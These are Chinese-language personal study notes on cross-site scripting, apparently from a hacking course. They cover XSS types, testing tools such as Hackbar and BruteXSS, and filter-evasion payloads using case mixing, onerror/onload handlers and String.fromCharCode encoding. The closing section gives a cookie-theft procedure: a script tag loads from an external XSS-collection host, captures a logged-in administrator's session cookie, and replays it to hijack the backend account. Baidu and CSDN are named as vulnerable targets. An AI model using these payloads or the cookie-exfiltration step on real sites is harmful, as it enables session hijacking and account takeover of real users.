xss是一个强漏洞
XSS(cross-site script)跨站脚本自1996年诞生以来,一直被OWASP(open web application security project) 评为十大安全漏洞中的第二威胁漏洞。也有黑客把xss当做新型的“缓冲区溢出攻击”,而JavaScript是新型的shellcode。
2011年6月份,国内最火的信息发布平台“新浪微博”爆发了xss蠕虫攻击,仅持续16分钟,感染用户近33000个,危害十分严重。
xss最大的特点就是能注入恶意的代码到用户浏览器的网页上,从而达到劫持用户会话的目的。
其实就是执行一段恶意js代码
************OWASP(一定要记住) --开放web应用安全项目
按照owasp执行
用多种浏览器去查看/调试,用穿山甲
payload利用攻击载荷
cookie:存放在本地的cookie中
通过cookie来欺骗浏览器,访问登录之后的页面
反射型,也称非持久型,DOM也属于反射型
存储型
挖掘:
1.手工挖 2.利用工具
大小写
特殊字符
特殊编码
引用其他JS语句
穿山甲->XSS编码->过过滤'或者"之类的
火狐插件->Hackbar,FireBug,Tamper Data,Live HTTP Headers,Editor Cookie
如何获取cookie,管理页面不知密码->document.coookie弹窗
或者发送到xss平台,将接收cookie的代码写进HTML里面去
穿山甲->工具->tamper Data->start tamper拦截来抓包
->还可以Add
HTTP头->Replay(重新发送包)
Editor Cookie就是穿山甲右侧->Cookies Manager+
漏洞一般会出现在数据交互的地方:
reg:登录,评论,留言,搜索
<textarea><script>alert(/xx/)</script></textarea>
百度的漏洞存在客户端上
百度网盘->左侧名称->修改不超过10个字符左右,然后抓包,burp插入JS代码就修改成功了,如果插入cookie,用户在线保存的话就会中招.
CSDN漏洞在我的博客->留言板上
常见的payload....
漏洞分析->bruteXSS 运行用python运行
运行用bruteXSS.py..
加载payload列表,去暴力破解
G/P:GET or POST
G
URL:xxx.asp?keyword=
使用默认列表 ENTER
Payload: </script>">.... 复制就行 放到URL后面执行一下
漏洞利用->OWASP(这个工具厉害一点)->打开
Settings->Configure Server->Start
Scanner->GET->复制URL->将下面的X复制放在URL后面->Fuzz
成功后会弹框
payload在上方URL里面
Scanner->POST->URL,,,Parameters写payload后面的->Fuzz
Dom也是
工具:Mantra
$x=preg_replace(“/script/”,””,$x);
$x=preg_replace(“/script/i”,””,$x); //加i的是不区分大小写的
常见的防xss代码,接收回来的/scipt/替换为空
http://xxx/xx?x=<body ...> //x是get过去的变量x
(注:手工调试尽量用火狐浏览器)
绕过方式:1.大小写替换,,reg:scRipt
2.<img src=1 onerror="alert(/xss/)">
3.<body onload="alert(/xss/)>
4.如果替换掉alert,就换别的试一下.reg:可以先编码,用Mantra->XSS->String.fromCharCode()
->onload="eval(String.fromCharCode(97,108,...就是alert编码))"
选中alert(/xss/)然后XSS->alert..替换成编码
\u003c\u003e 代表<>
\u003cimg src=1 onerror=alert(/xss/)\u003e->/xss/改成_key_
cookie获取:
反射型XSS:
网址:XSS Platform
http://pip3.win/xss.php?do=project&act=viewcode&ty=create&id=16
reg:假如说发现一个网址的搜索有弹窗,就复制整个url,将弹窗内容改为下面这个
<sCRiPt sRc=http://pip3.win/qtCa><sCrIpT>
必须是在登录了后台系统之后的页面输入url,
再发送到
然后XSS平台->test->复制cookie,找到这个登录后台的login,然后打开漏洞利用->马哥->url下面那一段将cookie复制,然后点击强行修改cookie
可以放在x.html里面<img src="url复制过来">